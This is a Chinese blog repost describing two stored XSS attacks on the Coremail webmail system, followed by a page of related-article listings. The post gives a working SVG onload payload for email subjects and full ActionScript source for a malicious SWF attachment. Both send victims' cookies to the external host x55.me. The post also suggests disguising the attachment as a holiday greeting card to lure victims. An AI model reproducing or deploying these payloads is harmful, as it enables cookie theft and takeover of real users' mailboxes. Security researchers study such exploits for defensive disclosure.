Coremail邮件系统存储型XSS两个

最新推荐文章于 2022-09-18 16:28:10 发布
最新推荐文章于 2022-09-18 16:28:10 发布
阅读量342 收藏 1
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/hookjoy/p/4039540.html
版权

(1):Coremail邮件系统存储型XSS之一

给受害者发送主题如下的邮件:

<svg onload='img=new Image();img.src="//x55.me/geo.php?get="+document.cookie;'>



当受害者试图打开邮件时,cookie将会被窃取:




(2):Coremail邮件系统存储型XSS之二

将特制的swf文件作为附件发送给受害者(这里可以选择在过节的时候下手,比如将文件名改称新年贺卡.swf):

swf文件的AS代码如下(将就着看吧,东拼西凑整出来的):



package {

    import flash.external.ExternalInterface;

    import flash.display.Sprite;

    import flash.display.Sprite;

    import flash.events.Event;

    import flash.net.URLLoader;

    import flash.net.URLRequest;

    import flash.text.TextField;

    import flash.text.TextFieldAutoSize;

    import flash.xml.*;

    import flash.events.IOErrorEvent;

    import flash.events.*;

    import flash.net.*;

    /**

     * @author User

     */



    



     public class csrf extends Sprite {

        

        private var loader:URLLoader;

        public function csrf() {

            var res:String = ExternalInterface.call("function(){return document.cookie;}");

            doGet(res);

        }

        

        private function doGet(res:String):void{

            loader = new URLLoader();

            var target:String = "http://x55.me/geo.php?get="+res;

            var request:URLRequest = new URLRequest(target);

            try {

                loader.load(request);

            } catch (error:Error) {

                sendDatatoJS("Error: " + error.getStackTrace());

            }

        }

        

        private function sendDatatoJS(data:String):void{

            trace(data);

            ExternalInterface.call("colsole.log", data);

        }

    }

    

    

}

 

一旦受害者打开附件里的swf文件,其cookies就会发送到攻击者的站点。

转载于:https://www.cnblogs.com/hookjoy/p/4039540.html

weixin_34008933
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
基于PHP的SquirrelMailphp邮件系统源码.zip
08-28
基于PHP的SquirrelMailphp邮件系统源码.zip
SMTP电子邮件格式及源码解析
热门推荐
Fly2Leo的专栏
08-28 2万+
SMTP协议之电子邮件格式 以下是使用FOXMAIL接收邮件后,得到的邮件源码,包括正文和两个附件(.JPG, .TXT): ---------------------------------------------------------------- 以下部分为邮件服务器添加的邮件头 -----------------------------------------------
Coremail手机版页面持久XSS实践
乐枕的家
05-01 2763
0x00 前言学校的邮箱是号称7亿用户都在用的Coremail邮箱系统. 利用这个漏洞,我们可以在一些条件下直接进入邮箱.这个持久XSS是王欢学长在上个暑假发现的,欢哥喜欢从小鸭子们身上收获编程的灵感,偷偷的告诉大家他的微信号:qqwanghuan0x01 描述当我们使用手机访问mail.bjtu.edu.cn登录时,会跳转到手机版的登录界面.0x02 详情这个XSS发生的位置就是"发件人"的位
coremail漏洞_Coremail多个安全漏洞预警
weixin_30880565的博客
01-30 3846
1.安全公告2019年6月14,Coremail发布了3个高危漏洞的安全公告,补丁编号:CMXT5-2019-0001,涉及模块apiws,补丁修复IP限制不合理和存在路径遍历的漏洞;补丁编号:CMXT5-2019-0002,涉及模块mailsms,补丁修复信息泄露的漏洞;补丁编号:CMXT5-2019-0003,涉及模块wmsvr,补丁修复信息泄露的漏洞、反射XSS、路径遍历、...
Coremail接口存配置读取漏洞POC
Sylon的博客
06-14 1万+
Coremail产品诞生于1999年,经过二十多年发展,如今从亿万级别的运营系统,到几万人的大企业,都有了Coremail的客户。 截止2019年,Coremail邮件系统产品在国内已拥有10亿终端用户,是目前国内拥有邮箱使用用户最多的邮件系统Coremail今天不但为网易(126、163、yeah)、移动,联通等知名运营商提供电子邮件整体技术解决方案及企业邮局运营服务,还为石油、钢铁、...
Coremail邮件系统 2.11.3
10-04
Coremail闪电邮客户端软件是一款优秀的国产电子邮件客户端,是为企业用户打造的企业级邮件客户端软件。提供独创的Coremail私有邮件协议,同时支持POP3、IMAP邮箱协议;可同时管理多个
Coremail邮件系统解决方案.doc
07-08
Coremail邮件系统解决方案.doc
Coremail邮件系统解决方案收集.pdf
03-03
Coremail邮件系统解决方案收集.pdf
Coremail邮件系统企业通讯录插件 v3.1.0.3.zip
07-17
Coremail邮件系统企业通讯录插件是为Outlook、Foxmail等常用客户端同步企业通讯录的有力工具,采用Coremail邮件系统的企业用户通过安装本插件,可将企业通讯录完整组织架构导入客户端中,使企业员工通信更加方便高效...
coremail-address-book::e-mail:Coremail邮件系统组织通讯录入门脚本
03-11
coremail地址簿 :e-mail: Coremail邮件系统组织通讯录一键导出安装二进制包在有各个系统的zip包,根据系统下载对应的zip文件并解压后使用。原始码编译$ git clone [email protected]:dpu/coremail-address-book.git$ cd...
世爵php程序源码
10-16
此程序为最新版本,完美无错节,进过多次升级优化,功能完善,界面优美,操作简易,系统安全稳定的程序。
Coremail企业管理使用手册
10-24
Coremail企业管理 本文档版权归盈世信息科技(北京)有限公司所有,并保留一切权利
Coremail远程代码执行
xxx9686的博客
09-18 736
Coremail的nginx配置文件中针对/lunkr/cache路径做upstream的时候未做X-Forwarded-For字段的设置,从而可以利用该接口实现配合利用nginx不解析;但是tomcat解析;的差异特性实现绕过tomcat的manager应用127.0.0.1本地ip限制。并且coremail默认的tomcat-user为coremail,coremail。访问过去会直接跳转到tomcat控制台,这里你就可以采用coremail/coremail弱口令尝试登陆,或者暴力破解。
CVE-2018-6882 Zimbra邮件系统XSS漏洞利用
weixin_30343157的博客
05-08 1428
CVE-2018-6882是一个存储XSS漏洞,利用该漏洞可获取目标邮箱的收件箱、发件箱等邮件内容。也可以给目标邮箱绑定一个“辅助邮箱”,当目标邮箱收到新邮件时“辅助邮箱”也会收到相同的邮件,实现对目标邮箱的实时监控。 漏洞细节请大家参考这篇文章:https://www.securify.nl/advisory/SFY20180101/cross-site-scripting-vu...
【漏洞学习——XSS】Protonmail存储XSS漏洞
Fly_鹏程万里
03-07 662
大家好,这篇文章我将分享在Protonmail的Web端发现两个严重漏洞。 漏洞1:暴力破解 我在注册了邮箱服务,测试了一些IDOR攻击,虽然没发现什么漏洞,但我在HTTP请求中发现了用来重置密码的10数字码!因此,我可以通过暴力破解来非法重置用户密码。 漏洞2:存储XSS 我还在Protonmail电子邮件编写页面中发现了一个存储XSS,并且只要向其他用户发送构造好的邮件就可...
存储XSS简介
seek_2022的博客
05-05 1万+
文章目录一、存储XSS简介(一)存储XSS的概念(二)存储XSS攻击过程(三)打XSS的潜在风险二、XSS平台使用方法三、靶场实战 一、存储XSS简介 (一)存储XSS的概念 存储XSS又称持久XSS,攻击脚本将被永久地存放在目标服务器的数据库或文件中,具有很高的隐蔽性。反射XSS的被攻击对象一般是攻击者去寻找的,就比如说:一个攻击者想盗取A的账号,那么攻击者就可以将一个含有反射XSS的特制URL链接发送给A,然后用花言巧语诱骗A点击链接。当A不小心点进去时,就会立即受到XSS攻击。这种
coremail 自动登录
lydawen的专栏
08-03 795
说是coremail自动登录,其实就是模拟做一个自动登录,一个很简洁的页面,几行代码,结果发现post数据过去居然不成功。   &lt;html&gt; &lt;form action="http://mail.xxxxx.com/coremail/index.jsp" method="post"&gt; &lt;input type="text" id="uid" name=&
coremail小结
javavsnet
04-15 1943
最近对coremail邮件系统做了调研,总结如下: 1. coremail最初是基于开源邮件系统postfix开发的。基于国外的开源产品开发自己的闭源产品,是国人自主研发的基本套路。 2. 产品已经有10年历史,对postfix有大量的重写和扩充,MTA部分完全重写了。coremail提供了很多postfix没有的功能,在反垃圾邮件,反病毒方面做了很多工作。 3. 产品得到了大量应用,网易邮...
coremail邮件系统 3.0.3
最新发布
11-15
首先,coremail邮件系统 3.0.3 支持高效稳定的邮件传输和存储,能够满足企业和个人用户大规模邮件的发送和接收需求,保障邮件系统的稳定运行。其邮件存储和检索功能能够快速高效地管理大量的邮件数据,提高工作效率...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值